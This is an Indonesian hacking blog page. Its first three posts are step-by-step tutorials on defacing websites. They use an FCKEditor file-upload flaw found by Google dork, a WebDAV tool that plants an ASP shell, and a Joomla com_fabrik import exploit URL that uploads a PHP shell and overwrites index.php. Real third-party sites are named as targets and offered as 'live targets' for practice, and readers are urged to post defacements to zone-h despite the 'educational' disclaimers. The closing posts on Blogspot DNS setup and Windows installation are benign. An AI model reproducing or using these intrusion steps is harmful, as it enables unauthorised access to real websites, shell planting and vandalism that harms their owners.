kembang api


teks

Selamat Datang Di Blog Kami

kursor

Sasuke's Mangekyō Sharingan

jam

Rabu, 31 Desember 2014

Cara Deface Website Dengan File Upload

ali ini kami akan berbagi step-by-step detail mengenai cara mendeface website, deface website, cara deface website dengan file upload.Yang perlu dipersiapkan adalah
  1. Komputer yang terkoneksi ke internet dan kopi
  2. Target website yang memiliki kelamahan
  3. File defacement / halaman deface
Langsung saja ya, kita harus mencari website yang memiliki kelemahan file upload, nanti kita cari saja disini www.exploit-db.com

PEMBUATAN FILE UNTUK DEFACE

Yang pertama harus kita lakukan adalah pembuatan file untuk deface, dibikin seindah mungkin.
/Mr.404NotFound, akan membuat halaman deface dengan extention .txt, bisa juga dengan file .html, .php, .asp, .shtml, dsb. Tergantung dari kemauan saja.
BinusHacker Team akan membuat halaman deface dengan kata-kata berikut:
BinusHacker Team Was Here
Tutorial Deface By BinusHacker Team – To All BinusHacker Family
*Remember: It’s Just For Educational Purpose!
Ingat! Dengan mendeface tidak akan menjadikan anda hebat :)
Special thanks for www.binushacker.net
Buka notepad, dan kemudian paste kata-kata diatas. Note: Kata-kata bisa sesuka hati sang defacer, tergantung mood :)
Langsung seperti gambar berikut:

Setelah selesai membuat dan merangkai kata yang indah, simpanlah file tersebut, sebagai contoh seperti gambar berikut:

BinusHacker menamakan file defacenya dengan nama: “defaced.txt“, nanti file ini yang akan di upload ke situs target.
Pembuatan halaman deface sudah selesai, lanjut ke step selanjutnya.

PENCARIAN & MENGUMPULKAN INFORMASI KELEMAHAN WEBSITE

Yang harus kita lakukan adalah cari tombol “SEARCH” di website www.exploit-db.com, kemudian klik. Masukkan keyword pencarian “File Upload” sesuai dengan data, contoh di gambar berikut:

Dari hasil search akan muncul banyak pilihan informasi-informasi kelemahan. Semua informasi ini bisa berguna untuk deface dengan cara “File Upload“, hasilnya seperti gambar dibawah:

Dari sekian banyak kelemahan, ambil salah satu kelemahan misalkan “FCKEditor All Version Arbitary Vulnerability“.
Klik informasi kelemahan tersebut, maka akan muncul petunjuk cara penggunaannya, seperti gambar dibawah:

Nah, kita sudah mendapatkan infromasi kelemahan. Maka selanjutnya kita harus mencari website target!

PENCARIAN WEBSITE TARGET DI SEARCH ENGINE

Kita cari website target yang akan dideface di mesin pencari, bisa menggunakan BING, YAHOO, BAIDU, ALLTHEWEB, GOOGLE. Kali ini yang paling mudah saja, gunakan ‘GOOGLE‘!
Bukan google search engine, kemudian masukkan kata kuncinya. Kata kunci didapatkan dari informasi kelemahan yang sebelumnya kita dapatkan, yaitu: “/editor/filemanager/” , kita masukkan kata kunci tersebut.
Cara memasukkanya dengan menggunakan fungsi INURL & SITE. INURL artinya pencarian dilakukan kepada setiap website yang di URL Addressnya mengandung kata “/editor/filemanager/“. SITE artinya pencarian dilakukan kepada domain TLD tertentu, disini kita mencari domain yang akhirannya .COM. Sehingga keywordnya menjadi: inurl: /editor/filemanager/ site: com
Dari hasil pencarian tersebut akan muncul beberapa tampilan website seperti berikut:

Dari hasil tersebut kita sudah mendapatkan informasi website target yaitu: http://www.madhouse1.com
Dengan informasi Situs Target URL lengkapnya: http://www.madhouse1.com/clients/dna/cms/HTMLEditor/

EKSEKUSI UPLOAD FILE UNTUK DEFACE

Oke, dari informasi kelemahan yang sebelumnya kita dapatkan, bahwa kelemahan terdapat di /editor/filemanager/connectors/uploadtest.html
http://www.madhouse1.com/clients/dna/cms/HTMLEditor/ <- Merupakan target dasar yang didapatkan dari google dan belum ditambahkan dengan url untuk file upload.


/editor/filemanager/connectors/uploadtest.html <- Sebagai tambahan di link yang memiliki kelemahan dan digunakan untuk file upload.
Kita gabungkan & masukkan URL webtarget tersebut sehingga menjadi: http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Untuk lebih jelas lihat gambar berikut:

Dari sana, kita pilih “Select the File Uploader” dengan “PHP“, dan “To User Resource Type” defaultnya “None” saja.
Lebih jelasnya seperti gambar berikut:

Kemudian pada “Upload New File“, klik “Browse“, nanti akan muncul folder pencarian, dimana akan meminta file untuk di Upload. Carilah file deface yang telah dibuat sebelumnya. Karena sebelumnya sudah disave dengan nama “defaced.txt“, maka kita cari file tersebut untuk di upload. Lihat gambar berikut:

Setelah file terupload, langsung saja klik “Send It To The Server“, proses akan berjalan, nanti akan muncul informasi seperti gambar dibawah:

Jika ada tulisan “File Uploaded With No Errors“, maka anda telah sukses melakukan upload file deface, jika tidak berarti anda gagal.
Informasi terakhir dari halaman deface adalah seperti ini:

Disana akan muncul informasi hasil atau tempat file terupload yaitu /PowerCMS folder/file/defaced.txt
Karena url berada di sana, maka URL hasil deface upload akan berada disini
Domain URL: http://www.madhouse1.com/
Hasil Upload URL: /PowerCMS folder/file/defaced.txt
Gabungkan hasil dari file upload menjadi: http://www.madhouse1.com/PowerCMS folder/file/defaced.txt
Nanti hasilnya akan seperti ini:

Selamat anda sudah berhasil mendeface, sekarang tinggal di upload ke www.zone-h.org / www.indonesiandefacer.org :)
INGAT! Jangan sekali-kali mendeface dengan mengatasnamakan BINUSHACKER.
Cara-cara di atas juga bisa diterapkan di berbagai vulnerability file upload, tinggal ikuti saja aturan main sesuai dengan vulnerability yang ditemukan.
Sebagai latihan, langsung saja menggunakan live target berikut, gunakan sebelum di PATCH!
1. http://www.royzband.com/cms/HTMLEditor/
Berikut adalah tampilan deface BinusHacker di royzband.com

Terima kasih.. Semoga sukses dan semoga berhasil :)

Cara Deface Index Website dengan Webdav For Newbie

Udah lama nih sob /Mr.404NotFound nggak share tutorial hacking, kali ini /Mr.404NotFound mau share tutorial buat newbie, yaitu Cara Deface Index Website dengan Webdav, langsung aja yuk sob.

cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav
peralatan:
Via Ziddu [ Download ]

step:
1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt
5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah index dari web tersebut
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

6. Stelah ketemu file yang berisi index lalu klik pada icon pensil disampingnya untuk mengedit, hapus semua scriptnya lalu tukar dengan script deface kalian sob, kemudian klik kaydet untuk menyimpan
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

7. Oke, script indexnya sudah saya ganti dengan script saya, dan sekarang saya akan mengakses http://www.beijingcoal.com/ untuk melihat hasilnya
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

oke, homepage / index website tersebut berhasil saya deface, jika sewaktu-waktu tampilan website tersebut telah kembali normal itu berarti adminnya telah memperbaiki website tersebut sob

oh iya tambahan lihat artikel berikut untuk mendapatkan daftar website yang bisa dijadikan target: 1000 Situs yang Vuln Terhadap Webdav

sekian Tutorial Deface Index Website dengan Webdav ini, ini hanya untuk pelajaran dan jangan merusak website orang lain sob, saya tidak menanggung atas semua resiko yang terjadi pada anda

keyword: cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

Cara deface dengan metode Com_Fabrik

Cara deface dengan metode Com_Fabrik - Halo sahabat Scupe.Id, kali ini saya akan memberi tahu anda bagaimana cara mendeface web joomla dengan metode Exploit Joomla ( Com_Fabrik ). Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba.

Bahan: Shell ( Download Here )

Baca Juga: Download Shell 1n73ction V 3.2 [Special Edition]


Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com 
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.



2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. Masukkan shell milik sobat (Pilih File)  dan lalu klik tombol import CSV

4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)
*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.
5. Klik pada tulisan htdocs/public_html/lainnya sesuai dengan webnya  (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama


6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya 


7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.
8. Jika save succes maka akan muncul script anda di halaman utama web target.

Cara Seting Domain Blogspot (Di Afraid)

Ini adalah tutorial singkat Cara parking domain di blogspot, cara ini menggunakan afraid sebagai perantaranya, tapi sebelum menggunakan metode ini domain harus diarahkan ke afraid dulu.
Untuk mengarahkan domain ke afraid cukup isikan Name Server (NS) di registrar domainnya dan NS seperti ini 
ns1.afraid.org
ns2.afraid.org
ns3.afraid.org 
ns4.afraid.org
Jika sudah langsung aja ketahap selanjtnya dengan mengikuti tutorialnya dibawah ini

Daftar dulu DNS Afraid
Jika sudah daftar klik Domains lalu klik Add Domains 




SKIP buat Account / Domain

Kemudian login ke Blogger
Pilih blog yang mau dipasangkan domain baru
Pergi ke Setelan > Dasar
Sekarang klik diagian Tambahkan domain khusus, lalu ketik url domain baru kamu dengan menggunakan awalan "www"





Klik Simpan, lalu blogger akan menampilkan error seperti ini 
"Kami tidak dapat memverifikasi otoritas Anda untuk domain ini. Kesalahan 12"

Nanti ada KODE seperti ghs.google , dan sebagainya :)


Kemudian pada DNS Afraid, klik Manage. 


Masukkan IP blogger dan CNAME blogger kamu tadi


IP Blogger:       
216.239.32.21
216.239.34.21
216.239.36.21
216.239.38.21
 

Selanjutnya ke Blogger lagi, masukkan domainnya & Simpan.
Selesai. Jika masih menampilkan pesan error, tunggu beberapa jam, kemudian ulangi lagi menambahkan nama domain kamu pada pengaturan Blogger.

Author : Syahrul Ramadhan
-/Mr.404NotFound-

Cara Menginstall Windows 7 dan 8 Dengan Flashdisk , CD , DVD

selamat siang :) kali ini saya mau share tutorial Menginstall Windows 7 dan 8 Dengan Flashdisk , CD , DVD 
oke :) mungkin gambar atau screenshot saya ambil dari situs resmi windows nya sendiri :)
karna susah juga klau lg inul di screnshot :D
oke langsung saja

1. Pastikan dari BIOS booting komputer Anda di setting untuk DVD
2. Masukkan DVD windows 7
3. Tekan Sembarang tombol saat muncul BOOT FROM CD or DVD





4. Akan terlihat gambar seperti dibawah ini






5. Pilihlah Indonesian pada Language, time, currency, and location



  
6. Tekan tombol install




7. Tunggulah beberapa saat proses ini




8. Centang pada I accept the license terms sebagai persetujuan penggunaan windows 7 kemudian klik next


9. Pilih saja custom (advanced) untuk memilih di drive mana windows 7 akan di install




10. Anda bisa mengatur drive sekaligus partisi pada step ini, saya sarankan bagilah hardisk Anda minimal 2 drive, satu untuk drive untuk windows 7 (C) dan satu drive untuk data (D) dengan memilih drive option, atau langsung saja tekan next dengan asumsi Anda akan mempartisi hardisk setelah instalasi windows 7 selesai.  


 11. Tunggulah proses ini beberapa saat














13. Setelah restart akan muncul gambar berikut ini 
14. Tunggulah proses Setting up the services hanya beberapa saat saja 


 15. Instalasi akan dilanjutkan secara otomatis


16. Masukkan Nama User dan Nama Komputer sesuka Anda




17. Jika perlu password ketikkan passtwordnya 2 kali atau kosongkan saja jika Anda tidak ingin mempassword user Anda




18. Masukkan product key serial number windows 7 Anda




19. Pilihlah level proteksi keamanan dari Microsoft

    
20. Atur Zona waktu Anda (untuk Indonesia +7 dari GMT)




21. Selamat, windows 7 Anda siap digunakan




Terima kasih atas kunjungannya semoga bermanfaat ^_^    

Postingan Lebih Baru Postingan Lama Beranda